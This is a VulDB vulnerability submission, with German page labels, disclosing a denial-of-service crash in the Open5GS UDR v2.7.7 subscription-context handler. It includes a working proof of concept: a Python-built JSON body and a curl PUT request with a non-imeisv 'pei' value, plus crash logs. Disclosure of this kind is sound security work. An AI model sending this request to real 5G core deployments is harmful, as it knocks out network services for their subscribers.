Submit #805699: Open5gs UDR v2.7.7 Denial of Serviceinfo

TitelOpen5gs UDR v2.7.7 Denial of Service
Beschreibung### Open5GS Release, Revision, or Tag v2.7.7 ### Description UDR crashes when `PUT /nudr-dr/v1/subscription-data/{supi}/context-data/amf-3gpp-access` contains a syntactically valid `pei` string whose prefix is not `imeisv`. In `udr_nudr_dr_handle_subscription_context()`, the handler parses the optional `pei` field into `type` and `value`, then only accepts `type == "imeisv"`. Any other type hits: ```c ogs_fatal("Unknown Type = %s", type); ogs_assert_if_reached(); ``` This is reachable by a single request because the OpenAPI parser accepts `pei` as an arbitrary string. ### Steps to reproduce 1. Start the official Open5GS v2.7.7 Docker deployment and make sure the UDR SBI endpoint is reachable. In my live setup the UDR endpoint was `http://10.33.33.11:80`. 2. Send the following request: ```bash payload=$(python3 - <<'PY' import json body = { "amfInstanceId": "amf-test", "deregCallbackUri": "http://amf.open5gs.org/notify", "guami": { "plmnId": {"mcc": "001", "mnc": "01"}, "amfId": "020040" }, "ratType": "NR", "pei": "foo-123" } print(json.dumps(body, separators=(",", ":"))) PY ) curl --http2-prior-knowledge -v \ -X PUT \ http://10.33.33.11/nudr-dr/v1/subscription-data/imsi-001011234567891/context-data/amf-3gpp-access \ -H 'content-type: application/json' \ --data "$payload" ``` 3. Check the UDR logs and restart state: ```bash docker logs --tail 80 udr docker inspect -f '{{.State.Status}} {{.State.StartedAt}} {{.RestartCount}} {{.State.FinishedAt}}' udr ``` ### Logs ```text curl: (92) HTTP/2 stream 1 was not closed cleanly before end of the underlying stream ``` ```text Open5GS daemon v2.7.7 04/13 16:52:10.859: [app] INFO: Configuration: '/etc/open5gs/custom/udr.yaml' (../lib/app/ogs-init.c:144) 04/13 16:52:10.859: [app] INFO: File Logging: 'var/log/open5gs/udr.log' (../lib/app/ogs-init.c:147) 04/13 16:52:10.865: [sbi] INFO: Setup NF EndPoint(fqdn) [nrf.open5gs.org:80] (../lib/sbi/context.c:451) 04/13 16:52:10.876: [dbi] INFO: MongoDB URI: 'mongodb://db.open5gs.org/open5gs' (../lib/dbi/ogs-mongoc.c:130) 04/13 16:52:10.876: [sbi] INFO: NF Service [nudr-dr] (../lib/sbi/context.c:1985) 04/13 16:52:10.882: [sbi] INFO: nghttp2_server() [http://udr.open5gs.org]:80 (../lib/sbi/nghttp2-server.c:434) 04/13 16:52:10.882: [app] INFO: UDR initialize...done (../src/udr/app.c:31) 04/13 16:52:10.886: [sbi] INFO: [1d506752-3759-41f1-aaa4-49619b02513b] NF registered [Heartbeat:10s] (../lib/sbi/nf-sm.c:341) 04/13 16:52:10.889: [sbi] INFO: Setup NF EndPoint(fqdn) [nrf.open5gs.org:80] (../lib/sbi/nnrf-handler.c:969) 04/13 16:52:10.889: [sbi] INFO: [1d5483dc-3759-41f1-a1a7-9bea98579840] Subscription created until 2026-04-14T16:52:10.889146+00:00 [duration:86400000000,validity:86400.000000,patch:43200.000000] (../lib/sbi/nnrf-handler.c:888) 04/13 16:52:12.906: [udr] FATAL: Unknown Type = foo (../src/udr/nudr-handler.c:314) 04/13 16:52:12.906: [udr] FATAL: udr_nudr_dr_handle_subscription_context: should not be reached. (../src/udr/nudr-handler.c:315) 04/13 16:52:12.908: [core] FATAL: backtrace() returned 8 addresses (../lib/core/ogs-abort.c:37) open5gs-udrd(+0x953a) [0x56136a15453a] open5gs-udrd(+0x60c0) [0x56136a1510c0] /usr/local/lib/libogscore.so.2(ogs_fsm_dispatch+0x119) [0x7fdf9abd7abc] open5gs-udrd(+0x4e0a) [0x56136a14fe0a] /usr/local/lib/libogscore.so.2(+0x12b4f) [0x7fdf9abc7b4f] /lib/x86_64-linux-gnu/libc.so.6(+0x94ac3) [0x7fdf9a205ac3] /lib/x86_64-linux-gnu/libc.so.6(clone+0x44) [0x7fdf9a296a84] ``` ```text running 2026-04-13T16:52:13.348170908Z 1 2026-04-13T16:52:13.305189597Z ``` ### Expected behaviour UDR should reject unsupported `pei` formats with a normal HTTP error response. ### Observed Behaviour The HTTP/2 stream aborts, the UDR process crashes, and the container restarts automatically. ### eNodeB/gNodeB Not required. ### UE Models and versions Not required.
Quelle⚠️ https://github.com/open5gs/open5gs/issues/4410
Benutzer
 FrankyLin (UID 94345)
Einreichung15.04.2026 16:25 (vor 2 Monaten)
Moderieren03.05.2026 09:21 (18 days later)
StatusAkzeptiert
VulDB Eintrag360883 [Open5GS bis 2.7.7 UDR /src/udr/nudr-handler.c udr_nudr_dr_handle_subscription_context pei Denial of Service]
Punkte20

ZurückÜbersichtWeiter

Want to stay up to date on a daily basis?

Enable the mail alert feature now!